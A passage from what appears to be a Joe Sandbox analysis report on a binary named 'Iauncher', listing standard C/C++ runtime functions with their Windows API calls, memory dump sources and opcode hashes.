                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                    • Opcode ID: 4ab44dba6ff8fb3fdfbbfa342591c3691c0b1e283bb320145b9a389f2a2d3d65
                                                                                                                                                    • Instruction ID: 538b4bca8fbb9c84516acb827cf2bb5d34800b0243456b5ae7db9b2a84ef3150
                                                                                                                                                    • Opcode Fuzzy Hash: 4ab44dba6ff8fb3fdfbbfa342591c3691c0b1e283bb320145b9a389f2a2d3d65
                                                                                                                                                    • Instruction Fuzzy Hash: C3219271200206AF9F20AF61AC89C6B7FAEFF84364710C919F91D97151D731EC11ABA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005701EB Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d4dfb705889c25b6fb19346a614ac34a07a3ae9ad799181cea6eb1d170d12bc6
                                                                                                                                                    • Instruction ID: e1ec0a13de9f59e9acbeca126295a998dd9db225988ea73624f82cd8fa4ae546
                                                                                                                                                    • Opcode Fuzzy Hash: d4dfb705889c25b6fb19346a614ac34a07a3ae9ad799181cea6eb1d170d12bc6
                                                                                                                                                    • Instruction Fuzzy Hash: 6321807A601216EF9B60AFA1EC4D82B7FE9FF50364710D915F95997182DB31EC00E7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0057A361 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0057A369
                                                                                                                                                      • Part of subcall function 00578FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00576B60,?,00000000,-00000008), ref: 0057905B
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0057A3A1
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0057A3C1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                    • Opcode ID: a6f73c5a2874d9d98cc42576d75c17be652c9739d315007deacc75f7c945e8a1
                                                                                                                                                    • Instruction ID: 782f21169363ae281e34ed7ea44e9c530e04ad86ee39b7afa3c762dc20dd0e70
                                                                                                                                                    • Opcode Fuzzy Hash: a6f73c5a2874d9d98cc42576d75c17be652c9739d315007deacc75f7c945e8a1
                                                                                                                                                    • Instruction Fuzzy Hash: B5118EF191561BBF66116BB17C8EC6F2D5CEFD52A43119824F80991101EF208D80A6B2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00561DFD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00561E09
                                                                                                                                                    • int.LIBCPMT ref: 00561E1C
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::_Lockit.LIBCPMT ref: 00562588
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::~_Lockit.LIBCPMT ref: 005625A2
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00561E4F
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00561E65
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 459529453-0
                                                                                                                                                    • Opcode ID: 56ab0aa4ea0e4f01f57d60bea57bd33e0285e0c2ef34f3ed4c7cfa3d7ba4a0b1
                                                                                                                                                    • Instruction ID: 4639e12f61cbd439b1e0bd5aaad5e678c55ab548b5e0dd4d35ba70440891d702
                                                                                                                                                    • Opcode Fuzzy Hash: 56ab0aa4ea0e4f01f57d60bea57bd33e0285e0c2ef34f3ed4c7cfa3d7ba4a0b1
                                                                                                                                                    • Instruction Fuzzy Hash: 3A01A732500515ABCB15ABA4D81A8AE7F78FFD1760F640558FD01AB290EB71DE41DB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00561D84 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00561D90
                                                                                                                                                    • int.LIBCPMT ref: 00561DA3
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::_Lockit.LIBCPMT ref: 00562588
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::~_Lockit.LIBCPMT ref: 005625A2
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00561DD6
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00561DEC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 459529453-0
                                                                                                                                                    • Opcode ID: 0ad77154c395b2b4faac93a51f0c77427f1d4eca8267b441787550c286964a38
                                                                                                                                                    • Instruction ID: 750c7d248d1be03336e51b146f448a87ac55eb7ee91901ae8768833d2884c627
                                                                                                                                                    • Opcode Fuzzy Hash: 0ad77154c395b2b4faac93a51f0c77427f1d4eca8267b441787550c286964a38
                                                                                                                                                    • Instruction Fuzzy Hash: 9901A276900915ABCB15AB94D81A8BD7F78FFD0760F240158F902AB291EB309E81DB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00580A5F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,0057F92B,00000000,00000001,00000000,00000000,?,00577C6D,00000000,00000000,00000000), ref: 00580A76
                                                                                                                                                    • GetLastError.KERNEL32(?,0057F92B,00000000,00000001,00000000,00000000,?,00577C6D,00000000,00000000,00000000,00000000,00000000,?,005781F4,00000000), ref: 00580A82
                                                                                                                                                      • Part of subcall function 00580A48: CloseHandle.KERNEL32(FFFFFFFE,00580A92,?,0057F92B,00000000,00000001,00000000,00000000,?,00577C6D,00000000,00000000,00000000,00000000,00000000), ref: 00580A58
                                                                                                                                                    • ___initconout.LIBCMT ref: 00580A92
                                                                                                                                                      • Part of subcall function 00580A0A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00580A39,0057F918,00000000,?,00577C6D,00000000,00000000,00000000,00000000), ref: 00580A1D
                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,0057F92B,00000000,00000001,00000000,00000000,?,00577C6D,00000000,00000000,00000000,00000000), ref: 00580AA7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                    • Opcode ID: 6bd3c4b01243ecf48f62f74adc142f05e62a0c4896a88bd9eb049e142ab70a95
                                                                                                                                                    • Instruction ID: 5b4d81848ed9cd4472a802ee1dfcc771884781c6f16a722b78818cded68f12e1
                                                                                                                                                    • Opcode Fuzzy Hash: 6bd3c4b01243ecf48f62f74adc142f05e62a0c4896a88bd9eb049e142ab70a95
                                                                                                                                                    • Instruction Fuzzy Hash: 4FF01C36500269BBCFA62FD5EC4D98A3F66FB697A1F045010FE19B5160D6328824EF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00581803 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0058116F), ref: 0058181C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                    • String ID: TzX$SV
                                                                                                                                                    • API String ID: 3527080286-1236136107
                                                                                                                                                    • Opcode ID: 7c80f87416e6139804db78f77dbd256dbf4af03e5dc512c1bd1bf62e3311810b
                                                                                                                                                    • Instruction ID: f7cfe5147d7bae5ab35e00dab92ec7de00d1bc51538985272cd1c09928592fcb
                                                                                                                                                    • Opcode Fuzzy Hash: 7c80f87416e6139804db78f77dbd256dbf4af03e5dc512c1bd1bf62e3311810b
                                                                                                                                                    • Instruction Fuzzy Hash: 7F518C70904E0ECBCF14AFA9D89C1ADBFB8FB09310F114585EC91B6254CB748A6ADF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00569D8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 00569DB2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                    • Opcode ID: 61a25bfb5816decf72d7ae005e283730cfd82f7dd0b7af56615de460becc5959
                                                                                                                                                    • Instruction ID: f9f05d471e612532b99d77f0d8d5a59de8ff6dbb97ef4ea15a5c70aba94e3816
                                                                                                                                                    • Opcode Fuzzy Hash: 61a25bfb5816decf72d7ae005e283730cfd82f7dd0b7af56615de460becc5959
                                                                                                                                                    • Instruction Fuzzy Hash: 2841487290020AAFCF15DF94C985AEEBFB9FF48300F188199FA05A7261D7369D50DB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0056A722 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,0056A89D,00000002,FlsGetValue,00585D40,FlsGetValue,00000000,?,0056972D), ref: 0056A7A5
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0056A7AF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                                                                    • String ID: @]X
                                                                                                                                                    • API String ID: 3013587201-3850284557
                                                                                                                                                    • Opcode ID: 41c81863bd52c15431092e99393f6ce71de39057c2df35b8bd0b30d0a0a8676c
                                                                                                                                                    • Instruction ID: 75b590781efe113c335f19460a488d93426bb140769538ff9264899e8142fd47
                                                                                                                                                    • Opcode Fuzzy Hash: 41c81863bd52c15431092e99393f6ce71de39057c2df35b8bd0b30d0a0a8676c
                                                                                                                                                    • Instruction Fuzzy Hash: 07117C356002159F9F23CF64DC8099A7BB5FB593607240269EA05FB250E630ED01DF92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 005646BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005646C7
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00564723
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 593203224-4155469514
                                                                                                                                                    • Opcode ID: 9ebf8ef5dde649dfa98eb3ae28a8a914d7d967ef588709bfe9ae805a4744396e
                                                                                                                                                    • Instruction ID: 8c28116ec6bb0e953ba56d922f4cd9078597f1a86702dc84e4427da3a1580ff0
                                                                                                                                                    • Opcode Fuzzy Hash: 9ebf8ef5dde649dfa98eb3ae28a8a914d7d967ef588709bfe9ae805a4744396e
                                                                                                                                                    • Instruction Fuzzy Hash: F5018035A00115DFCB00DB14C899E597BB8FF95750B150099E802AB360DB70ED85CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00568E4C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00564457,?,0058CDB4,?), ref: 00568EAC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                    • String ID: WDV$SV
                                                                                                                                                    • API String ID: 3997070919-2958620284
                                                                                                                                                    • Opcode ID: 964d3d51ec5572e13a8cb3816b6fe97af5d5de74a2a0bcec7c1782c5ee5c0b83
                                                                                                                                                    • Instruction ID: 2e48817d100eb1baa4271c46d08f14970547fe883a3c0127d0eaddd62039c52f
                                                                                                                                                    • Opcode Fuzzy Hash: 964d3d51ec5572e13a8cb3816b6fe97af5d5de74a2a0bcec7c1782c5ee5c0b83
                                                                                                                                                    • Instruction Fuzzy Hash: D401A7759002099BCB019F98D844BAEBFB8FF84700F154159EE15AB351DBB1DD01CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00561FF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00562000
                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00562038
                                                                                                                                                      • Part of subcall function 0056472C: _Yarn.LIBCPMT ref: 0056474B
                                                                                                                                                      • Part of subcall function 0056472C: _Yarn.LIBCPMT ref: 0056476F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                    • API String ID: 1908188788-1405518554
                                                                                                                                                    • Opcode ID: a2f487b2f4db40b38ff8e6d1fd005f3ed1a97e0f72b65466da6272b6b4435850
                                                                                                                                                    • Instruction ID: 8419c8cb1220260932f8266ca9ccb13a67fc5ce0c40649da82222d9a76e32e85
                                                                                                                                                    • Opcode Fuzzy Hash: a2f487b2f4db40b38ff8e6d1fd005f3ed1a97e0f72b65466da6272b6b4435850
                                                                                                                                                    • Instruction Fuzzy Hash: 72F01771505B419E83319F7A8485447FFE4BE292617908A2EE0DEC3A11D730E404CF6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

